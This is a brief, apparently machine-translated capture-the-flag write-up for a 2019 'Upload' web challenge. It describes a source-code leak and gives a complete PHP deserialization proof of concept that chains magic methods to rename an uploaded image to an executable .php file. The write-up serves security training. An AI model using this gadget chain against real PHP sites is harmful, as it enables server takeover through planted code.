table of Contents
Brush title record: [strong network Cup 2019] Upload
Recurring topic links: https://buuoj.cn/challenges
Reference Links: 2019 third cup strong network Web part WriteUp + reproduction environment
First, knowledge
1, source code leak
www.tar.gz
2, php deserialization
File looks great, but with phpstorm open, then find that the default open files, there are two breakpoints, in fact, is to give the hint, pointed out that the use of local deserialization. After the routine use of anti-serialization is not difficult.
The only caveat is that the serialization namespace serialization will go, so poc must be added to this placenamespace app\web\controller;
<?php
namespace app\web\controller;
class Profile
{
public $checker;
public $filename_tmp;
public $filename;
public $upload_menu;
public $ext;
public $img;
public $except;
public function __construct()
{
}
public function __get($name)
{
return $this->except[$name];
}
public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
}
class Register
{
public $checker;
public $registed;
public function __construct()
{
}
public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}
}
$b = new Profile();
$b->except = array('index'=>'img');
$b->img = "upload_img";
$b->ext = true;
$b->filename = "./upload/f4e7685fe689f675c85caeefaedcf40c/00bf23e130fa1e525e332ff03dae345d.php";
$b->filename_tmp = "./upload/f4e7685fe689f675c85caeefaedcf40c/00bf23e130fa1e525e332ff03dae345d.png";
$a = new Register();
$a->registed = false;
$a->checker = $b;
echo urlencode(base64_encode(serialize($a)));